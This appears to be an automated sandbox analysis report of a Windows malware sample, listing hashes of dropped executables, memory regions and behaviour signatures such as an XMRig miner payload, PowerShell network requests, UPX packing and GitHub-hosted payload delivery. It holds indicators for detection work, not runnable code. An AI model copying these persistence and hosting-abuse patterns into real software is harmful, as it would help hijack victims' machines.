MD5 aae278e8465072e722f6e14e7e1b5c2b
SHA1 c1f3fa11e27b42bb03993d46ffb084f9ac40f4cc
SHA256 838cfdb6b57c3067765dc3b822ae763e7e4d422c7fe6f572d5aa51cdd69d5f80
SHA512 1fbf3301c8455e3d1200b3de6d570969eead347a686105cee6e449c5766bc6b95fcd5092f99c88856e43cdd4d83ad80a1ab63f653720b569fba44ba18618f202

C:\Windows\system\HKqdahk.exe

MD5 c2febff58eb1064d4098a055d391b8ee
SHA1 a3b09ed18d6ca15cae85c3676e8a100a108aade0
SHA256 d3b2702236b7849477a7f9e50036f34bac7e12b99c8d58219d499ad2cf9b8485
SHA512 74ca7988d01c92d95104c05242d8fa515b6dfccf619de7b2ec5b7358e01ed1eb3e5f39aeb950f23b57f7152778c20bcc144dacd1d5052a3d63e13ee0ac76a572

C:\Windows\system\MhLqYRz.exe

MD5 ba61d6a110d838a552bc637ca7556536
SHA1 b8f292338f1ba028a3ace1e10dc9a3f8315f2108
SHA256 f9d8ae77bb48ae693fc18c86a6adb9c2b3c6f88273a301e19b6c375cbded8ede
SHA512 156792aec0efedf70eb488d39db76f15b5b831c525eb5b2898bcd427c315257741878f51c2edb7388e847797a0d1fbf3484d221e2a0cc8506e84822e270880e2

C:\Windows\system\oDWnPfE.exe

MD5 10b7a2ad3b9c6968b12235971b58b2b8
SHA1 cdd64da38315a8555d0ac59afa172b24b803d42f
SHA256 5156a59141b3c1cb7a37d79995bbb64a7e16d845aa232b505d836315ed3f87f7
SHA512 3d520af69eea6d3c9585ba0cd3e9a51cf960eb08d128a8aa5365bdb6f0ca1bfd0436ce44a5de2c6af6006fcb50e89b67207f0ca288129bc750cd17f8b9b16d8c

\Windows\system\rJydOJW.exe

MD5 0f8a59be32a7fcf1aa39cc09816afd72
SHA1 fd8fb195a5d7f842fe19ddbfedc7a296a9f7574f
SHA256 3286aefe96c73a660570a7b77287110b5050a1f85b21293914d28e2192ae00c2
SHA512 dbce2c8df813efa2798d575cb276d59f63c6332e30bdce1c398148df5e751767691a2e98605e60dc1cb1950ed076db7b37556e2bb906cb38c5d3598c24faf222

C:\Windows\system\PNpnkwR.exe

MD5 7a5c72b29bb9f9a1bc22aba31b5ad4e3
SHA1 cd3d4213ccc45e02e9bfd50d616311ea7355b0ec
SHA256 8d4b7572239bce47f1cbb396cb606983f7176fc4ca1c58c95b263e4f0d720df8
SHA512 71a5df4a425b8444ee47473afd287163ddbd933874d68d6190b856c184e6cc0fe085c9746f3660c7dda0229785e8aa00e593e64c74e5e18a2a7e7323cf1124ff

C:\Windows\system\wOIpRBT.exe

MD5 f3f0b4be63f4075ff19cb3ba953668f0
SHA1 6ce1fefae7d28fbdd8aef5acb840e8f561bf619c
SHA256 27367d5eb739969c3278d01e47f6de8f7ae3898e04d6c86a9475aff6419cb33d
SHA512 f54fb62e977af4c043ed80a5a37d6f078c937f699b7a27b9f5d1fce0ac6e0a66098af4ea579429d3c97d57fe72f76090032ee9a2ed5c7b8e98580fa4691b2354

C:\Windows\system\mTuDxUL.exe

MD5 0a184d11d5fa239f8358accb900f1ac8
SHA1 3b8fd2520f55ad5aa11433b47d001e2f6ee165c4
SHA256 127378f9efc04699bc5dab9ae13072478c1fa82699aabb8e8d1cee659963c5a4
SHA512 943301da0dc2cf10b3e065b8a267679ddcf9105cb1be421c49f4b35f4a196a0cebd63f884a1f79ff521b8fd0e8ed2e23126795b956533f838872e49baa0a9dd8

C:\Windows\system\YAnlios.exe

MD5 c7d31c9202196274d6407f3b953bb9a5
SHA1 cf7beba5f9f1073bb0044273d50c273f5ec452c3
SHA256 204401aa101205b436453166ac7e227f8978b0e00c4573e725d93d76d69808dc
SHA512 b7f0caaf759c1abd0d92b5193c7078564ff3cc8098f57589145e38b75b4bfbccd7a3d20277435902fecfb569df8007426befadaf31ad4417fac0e0dc16555fbb

memory/792-134-0x000007FEF5AA0000-0x000007FEF643D000-memory.dmp

memory/1316-133-0x000000013F1B0000-0x000000013F5A2000-memory.dmp

memory/2864-132-0x0000000002FD0000-0x00000000033C2000-memory.dmp

memory/1720-131-0x000000013FBD0000-0x000000013FFC2000-memory.dmp

memory/2864-130-0x000000013FBD0000-0x000000013FFC2000-memory.dmp

memory/2984-129-0x000000013F630000-0x000000013FA22000-memory.dmp

memory/2864-128-0x0000000002FD0000-0x00000000033C2000-memory.dmp

memory/2500-127-0x000000013F110000-0x000000013F502000-memory.dmp

memory/2864-126-0x0000000002FD0000-0x00000000033C2000-memory.dmp

C:\Windows\system\CmdKrOa.exe

MD5 3e0e307fc13f3d9f629324e24df5fd27
SHA1 379809baf1d806bbee08c1c5871c84e1a7f74aef
SHA256 8bf705cc706746c1124c92f8aebfc99035e182bd1bff4761e8d44ae7341ee84a
SHA512 d0f1b42bd2ef7a9428c80d1d717e494758a27edbc707f6d50ebad2205083e76c3b82261ae357ae69d1cc3f2bd3918a050b2637e7b5bf3fc26c6e514c1bc65b55

memory/2436-125-0x000000013F420000-0x000000013F812000-memory.dmp

memory/2864-124-0x0000000002FD0000-0x00000000033C2000-memory.dmp

memory/792-123-0x0000000001E20000-0x0000000001E28000-memory.dmp

memory/2820-122-0x000000013F800000-0x000000013FBF2000-memory.dmp

memory/792-121-0x000000001B520000-0x000000001B802000-memory.dmp

memory/2736-120-0x000000013F410000-0x000000013F802000-memory.dmp

memory/2864-119-0x0000000002FD0000-0x00000000033C2000-memory.dmp

memory/2872-118-0x000000013F0E0000-0x000000013F4D2000-memory.dmp

memory/2864-117-0x000000013F800000-0x000000013FBF2000-memory.dmp

memory/1032-116-0x000000013F500000-0x000000013F8F2000-memory.dmp

memory/2864-115-0x0000000002FD0000-0x00000000033C2000-memory.dmp

memory/2196-114-0x000000013FC50000-0x0000000140042000-memory.dmp

memory/2864-113-0x000000013FC50000-0x0000000140042000-memory.dmp

memory/792-112-0x000007FEF5AA0000-0x000007FEF643D000-memory.dmp

C:\Windows\system\zSPoBFR.exe

MD5 26154685c83a4aaebbcbd0ff8d34b50b
SHA1 b804c7f3619261453f5bf26662673e214eac3925
SHA256 4be0539cd6c07adb2f5f00d46089bf244804569396d3819f68f4cfd7566b6de4
SHA512 9c7d10e0468125bce2b4eebfe22c22705071aae11ad395d319124f34745c3942eb2c32be23e4e58988d332ac424d5a16a584cf5db91d81c6071030f5374edda7

C:\Windows\system\zMedrBD.exe

MD5 e99872b08181ec6b960f4ee20470b43f
SHA1 8d60a105d2d355267d1978cf6c42e19da357822e
SHA256 99dde5998b1e0c74e12dec24ef7e0e41f61ce5fb39ad4533f219e67b9b36b82a
SHA512 68d5beb2b189a3077d4146d8b1a62445eb765e7eeba2938d27d50bc580221fba78410fb6fcfd89a090526285c88a14b2ef193fbd86128060b58ccc49590e0222

C:\Windows\system\VbSEeme.exe

MD5 4e122372bf42324331c6e3feee84d005
SHA1 83b384fc5b5a09b73fac9e4fdcdc5445f56ada3e
SHA256 aab0568753443d125c73119fa7270174c86dd25034467e6ce570005ca2cf9796
SHA512 a070838b09bf5949da457e86c3a7b4323f6505c22361585da082f0f02e25c9616a97eccabd150eed624ad82b2600164d7f3dc805230f25fc8b8aeb589586f674

C:\Windows\system\kNCxyGB.exe

MD5 9ed2c5ea6d83b8148f8afbe7c50036bd
SHA1 41098579bbe0cae63c744e1f22492c7afc9b4cfb
SHA256 dfecc22a60c1e78e516058480cb508ce81a19c2cc02a87bd727789ef133d8226
SHA512 1063457663f4c0b6eb4a93acd6f0122978b5c2a9a1a00e0c504a57db304a7beedb28b7dc6ef8cb5f769ba61fb6c324a1575addf3a1a1b48527129f501f7fcb8c

C:\Windows\system\EymKlZn.exe

MD5 3da114410cb5293e1b90e2f5369eb76e
SHA1 6291cb9d8fbb2d7da49579160fd26e8f3d5df125
SHA256 6d032a8e24e3b34082f0bce33a72a786f4eb836b25232e08b3a78981a97abc0c
SHA512 e3a161b2a1c8bf3f390b060721587b677889c5aa0dd9e380d4f757375111d084ddaa818597c057ecfc5caecc07341541d61ae5aa3995f589863cdfb2feff73ed

C:\Windows\system\jJIBQXE.exe

MD5 72f3ed7fb14f27fc72118ef33e32c753
SHA1 43b380898fdbb20481145fbf5780fc6236745635
SHA256 0bb7da7f3a94a1bc27ccda4444da0e92a7d028659e9bf1613f1ea72abda0e48c
SHA512 8dcaa0031a3cee6699c83892acc3e3372612a87d7a001fbe89b45f823dbdb92039e5e12a021f35ccd8b4b9d6067da526aa2570f4364d29f6d3f7dfc7ee4b7535

C:\Windows\system\UnNFDEl.exe

MD5 83f30859977beaca41748cbbe5ea61f5
SHA1 54b551d82d8fc34916f41b6ffbe645721c9ec235
SHA256 648103d1b721503b50b2e88dddd010dbd50e35952171557bb7a0548f81091dd2
SHA512 23043e3a0954a345c617615addb636bfb52d141c18e295b28bedcc6f8b1aa6a1778501087ddf0bf68e6cfe2fa3924b2ca287f842600efbe42f4fa62306fea6dc

C:\Windows\system\RTqRbLm.exe

MD5 9595542e96d8fdad28f02676bc712a67
SHA1 e1483f6709848ac34f9aaee7d3346b0081678029
SHA256 0668de0a2778cabadd91cc180a8304750bd1b3050788fc39ac8838bfc360888e
SHA512 a72d7a740a7ef0f867d8644b3d95e2dca470229f16cfc6bcccf2594345e7bcd28d2f60376fc722bace5d0c4a70f3edbb5d4c68e149dbbfbe08e4f755c01100e4

C:\Windows\system\uFEkMbr.exe

MD5 7792515da9f2da69e025154063022674
SHA1 3eb3d311c0ce9eb271d8bf1ffb175660eda44fcf
SHA256 862cfc42cbe8b4ba4425d5511c2f6016fe733406d6ffec6908fab7370ec93e91
SHA512 7e872c2b7f88660e3efc26470854960862f9554ce388c1bb9aade38a8e78f8339664df8b793f7d299395af8637df5e5a7791c9f38725ea205a90fbd9b3a0298c

C:\Windows\system\vIAhSLq.exe

MD5 35ec41b1872528c5fa7d9510cd91dbed
SHA1 28961192f0eb8f39cb7c90a2d75932161a599006
SHA256 03a2b00aeb77f0776af86868b5388a841d738e2a698701e74f07f20cf14dee4c
SHA512 a45e60e94703a43f89a8975979b1974f342a455d101dc1f5180a5fdae5ed41b3ff23a7e899971ccdf4cf109e3e0e11eed1257d9e56e87bb5e0c6ee102f41b231

C:\Windows\system\jUMVpNd.exe

MD5 896b2f325c558b1774e8a30263e2c92c
SHA1 7e7c9141f7edcb99060a67770b2417ae8d5a6f27
SHA256 7010f9ad7b128ee0333c95179bf1339f0ffe9e561dbe09c756917625ac0ebfbd
SHA512 96273c69e8a532390249abe52d3802dcc1ca51c691da88b3d2caed4014a9b902684e326aab1263b4e5db7e564e8a46c24d9ce7d316eeb504876ce055b7fbcb5f

memory/792-151-0x000007FEF5AA0000-0x000007FEF643D000-memory.dmp

C:\Windows\system\ivvBPaY.exe

MD5 6222a97bc69a44ac0956f61a07b3b5aa
SHA1 45ac7a2a15918f5510ca2ee3b41e06b91942ef65
SHA256 7557edfd2de54fd767747b68492c92c6c15ebcfaaa4c406c277e482947640de9
SHA512 5b9f071c79733148e0ef50483768da15d195c3d44a45d9d10c9765a8fa82133ed390daa0cd7f2c2f0aa7433b8cffe7240dc6c83c5db6b686783b3bab5a7fd62f

C:\Windows\system\TZCAEHl.exe

MD5 4828f839e824576fddde409348a3e63d
SHA1 c6ce1a23520666d629850eb1b5ae9f289abe2080
SHA256 8a228ccb0de4d19fbb99a3e058d8e87990ff4ca8a4c7eea888f225dd3c4182bc
SHA512 b43ef0180fc5be0c2428f17c2222c7b173633e9a2690bb1e44233c7d9c63579c1560f7116ce46ef26b211d0aab5d7ecdcf9a628a79349434161e31d633b7cb1e

C:\Windows\system\FAROysU.exe

MD5 60f96fff759d25a2ceb5df889b4b785b
SHA1 3f0851f76c5564ed21f0c63d0725e2c581c70817
SHA256 de8e7db6afe03f808550c35f1412bbd100de178706c86d1aa48cea863756d2cb
SHA512 07ec99519bd6a27407ece15c6c51584a68f465b177a4ae05df6e3aae3598f18c37b406a3a67a3cccb13b475db149cda41bfbf7ef4c5479a2848e5ca9b2e6cc88

C:\Windows\system\uOgSixk.exe

MD5 c0bbef0bf4d16a6c4991e4be7513f0e0
SHA1 2d8dd692fe27baab1b2a152a94fd4ed638dde344
SHA256 5499f903d73a9c09110b8cd2c311b58e8dfc93e150a968d96c9a44be4b950b0f
SHA512 4502719ffb7d30872f2d99df23b5bd91521e957693746abb8c713ba9e870937fb25979f987077095574847269fbc734b2749176532079f506d9cf4cb04fcc850

C:\Windows\system\AmxBrUH.exe

MD5 6a50dc679f7f84db912da16ba3448869
SHA1 f981e7dd65dd9c19c9bee516676310b3f1294579
SHA256 7d1298387444cca092da39c66cf20994919c84306085fe5e23aaf98bfa823d6a
SHA512 1f603834bc970f45a06c1c750a08667f7b0a53cbcd96312df5ad3ba32b75db982cb7ed553484ed4a1c014785f6ccbd107a4a024a2fc843e6a55eae87c2fc8f2a

C:\Windows\system\GNUWyHB.exe

MD5 4c8bc6cf712b409c46bf63f702abb4cc
SHA1 2ada413636580c830fd5c5a36486217a7d99978f
SHA256 535aba028f172ba40f4c345318900162ff49c2f82f07db9c2ed39ae86e4bc24a
SHA512 a9beca33571feff858e3470cd13d2b221d4a6d4f8df4b66d8c1e7981f7a0bc130c8882d08344b43f0e10b77f0db25dd434ce44f645dec9611dd773e0f633e7ae

C:\Windows\system\xkjhmwC.exe

MD5 1dcb7596c8f3fc6f2cbf7bd2361308f5
SHA1 3b87f2c743a0efa85d4cbfc061b43463687ffc17
SHA256 23476dd17a412aa6e9985e7f3da7547edc35541178a45ccd20a94f8a455c5e9d
SHA512 4befd1ed6f237e2c685364da5c483bc70887e1c1c41f010466bf844ff59c1b95355c8113097fe74245fbf19a0aad923b6bc91e7e8fa66ea35519687ddc31251a

C:\Windows\system\LgfzDBn.exe

MD5 c34616c45bac559b25b62dd446d15bfd
SHA1 cffc1ca453b83d8259fec342ac57880e23232d43
SHA256 23cf05a50c2ae51dab49d3ef6325554da78fa271a6bbda8b6f8527214776c4a4
SHA512 ad348bbcf376146f05b7519d7cc560bc1d9225e4ff0ba714637ed9f1b02653036a7a651c132d9aa66d9f747711782f2acc728857134f96957a4c7a72cb9f036d

C:\Windows\system\okmMnPl.exe

MD5 60307c02ee419db10805f2799cfd31ff
SHA1 1dd47437c29210326f37a8df6e0ce3cfbd12df5c
SHA256 08f5f8d3f9574c9327cec740ba6a22948e850ca26a542dc244b27303bb219404
SHA512 7c74dc5aee9bd3861e6c71c8ccf3876d8c4d610ee9aa5698e2b5e26582488c9f470ecb118e8513db9b32d58322cd8b7ff22eaad94aca90efe4fb5a8fa3d57c34

C:\Windows\system\hyHzIlD.exe

MD5 562e1f503f9323ecdf03b75b8a046b84
SHA1 819970a3f333749dc5e6e81782e1214d8b97ac28
SHA256 e23de23d7273616e0f1e3fc9b3934e7ed5d8a6076756d487ea7f187fda90660f
SHA512 74b6d236f47cf7a927c00b106c5fd7982d548a0e5ea341f95506555fbf8b16a4bde57f5a2fdac9da7b5971549864df49221603298ec7d8d9df3d972894c2713f

memory/2872-5237-0x000000013F0E0000-0x000000013F4D2000-memory.dmp

memory/2632-5259-0x000000013FF50000-0x0000000140342000-memory.dmp

memory/1316-5345-0x000000013F1B0000-0x000000013F5A2000-memory.dmp

memory/2736-5455-0x000000013F410000-0x000000013F802000-memory.dmp

memory/1720-5454-0x000000013FBD0000-0x000000013FFC2000-memory.dmp

memory/2500-5460-0x000000013F110000-0x000000013F502000-memory.dmp

memory/2196-5514-0x000000013FC50000-0x0000000140042000-memory.dmp

memory/1032-5513-0x000000013F500000-0x000000013F8F2000-memory.dmp

memory/2532-5512-0x000000013FC20000-0x0000000140012000-memory.dmp

memory/2864-5548-0x000000013F330000-0x000000013F722000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-22 20:35

Reported

2024-05-22 20:38

Platform

win10v2004-20240508-en

Max time kernel

148s

Max time network

151s

Command Line

C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 13248 created 4104 N/A C:\Windows\system32\WerFaultSecure.exe C:\Windows\system32\svchost.exe

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\ifQndzY.exe N/A
N/A N/A C:\Windows\System\ipWXVFr.exe N/A
N/A N/A C:\Windows\System\jaAuCtC.exe N/A
N/A N/A C:\Windows\System\LgfzDBn.exe N/A
N/A N/A C:\Windows\System\okmMnPl.exe N/A
N/A N/A C:\Windows\System\MhLqYRz.exe N/A
N/A N/A C:\Windows\System\HKqdahk.exe N/A
N/A N/A C:\Windows\System\GNUWyHB.exe N/A
N/A N/A C:\Windows\System\xkjhmwC.exe N/A
N/A N/A C:\Windows\System\AmxBrUH.exe N/A
N/A N/A C:\Windows\System\oDWnPfE.exe N/A
N/A N/A C:\Windows\System\uOgSixk.exe N/A
N/A N/A C:\Windows\System\rJydOJW.exe N/A
N/A N/A C:\Windows\System\FAROysU.exe N/A
N/A N/A C:\Windows\System\PNpnkwR.exe N/A
N/A N/A C:\Windows\System\wOIpRBT.exe N/A
N/A N/A C:\Windows\System\TZCAEHl.exe N/A
N/A N/A C:\Windows\System\YAnlios.exe N/A
N/A N/A C:\Windows\System\mTuDxUL.exe N/A
N/A N/A C:\Windows\System\zSPoBFR.exe N/A
N/A N/A C:\Windows\System\CmdKrOa.exe N/A
N/A N/A C:\Windows\System\ivvBPaY.exe N/A
N/A N/A C:\Windows\System\zMedrBD.exe N/A
N/A N/A C:\Windows\System\vIAhSLq.exe N/A
N/A N/A C:\Windows\System\jUMVpNd.exe N/A
N/A N/A C:\Windows\System\uFEkMbr.exe N/A
N/A N/A C:\Windows\System\RTqRbLm.exe N/A
N/A N/A C:\Windows\System\UnNFDEl.exe N/A
N/A N/A C:\Windows\System\VbSEeme.exe N/A
N/A N/A C:\Windows\System\jJIBQXE.exe N/A
N/A N/A C:\Windows\System\EymKlZn.exe N/A
N/A N/A C:\Windows\System\kNCxyGB.exe N/A
N/A N/A C:\Windows\System\eqroqCr.exe N/A
N/A N/A C:\Windows\System\uuGccWN.exe N/A
N/A N/A C:\Windows\System\vdjwwvj.exe N/A
N/A N/A C:\Windows\System\erSJxWX.exe N/A
N/A N/A C:\Windows\System\mbTooqp.exe N/A
N/A N/A C:\Windows\System\nqiYQch.exe N/A
N/A N/A C:\Windows\System\JRbqhLS.exe N/A
N/A N/A C:\Windows\System\WYQyfou.exe N/A
N/A N/A C:\Windows\System\fKqXrXf.exe N/A
N/A N/A C:\Windows\System\orndOFF.exe N/A
N/A N/A C:\Windows\System\nTmThpr.exe N/A
N/A N/A C:\Windows\System\WwxVUgV.exe N/A
N/A N/A C:\Windows\System\EQrCocv.exe N/A
N/A N/A C:\Windows\System\nvCJULy.exe N/A
N/A N/A C:\Windows\System\itIQtXw.exe N/A
N/A N/A C:\Windows\System\NcxJKEj.exe N/A
N/A N/A C:\Windows\System\QafOrHJ.exe N/A
N/A N/A C:\Windows\System\dGQMWel.exe N/A
N/A N/A C:\Windows\System\Hsvotfc.exe N/A
N/A N/A C:\Windows\System\AoGdRUL.exe N/A
N/A N/A C:\Windows\System\KucEzuS.exe N/A
N/A N/A C:\Windows\System\OeVsRaD.exe N/A
N/A N/A C:\Windows\System\xFEUpAY.exe N/A
N/A N/A C:\Windows\System\ghrYUAq.exe N/A
N/A N/A C:\Windows\System\SWZPwLk.exe N/A
N/A N/A C:\Windows\System\kXwdUHk.exe N/A
N/A N/A C:\Windows\System\izrqqEY.exe N/A
N/A N/A C:\Windows\System\uqBEqbW.exe N/A
N/A N/A C:\Windows\System\kHIgBmL.exe N/A
N/A N/A C:\Windows\System\ciyQNTx.exe N/A
N/A N/A C:\Windows\System\HEXUmhe.exe N/A
N/A N/A C:\Windows\System\bHlPGAF.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\ZuPfcre.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\QfBFXhp.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\jlpBHqX.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\ujGjvOX.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\hfwdfLp.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\GrrWAtN.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\fEDAaJn.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\nyPwSpT.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\ciyQNTx.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\yEXyFoM.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\MrjoqrT.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\LgiTcHa.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\YlPgjNu.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\cXtUiPC.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\tQkouFY.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\JfTloLu.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\oZDuTQZ.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\jgHxtKR.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\vHnSviP.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\LxVbXQC.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\QwQupGs.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\dipMmNZ.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\mAmgwZC.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\cDpJQJa.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\sEDVaxe.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\fDgujPM.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\zaFKyYV.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\DGlDBVS.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\shyRiFn.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\FfocKiQ.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\sXWyTJn.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\ngyJDrm.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\FHfkDbW.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\NOuaHtd.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\uuGccWN.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\DVKAUZs.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\TnWSRrP.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\BMZGCqW.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\JwTirrs.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\VKNmdWS.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\yKgHpGt.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\OfnploN.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
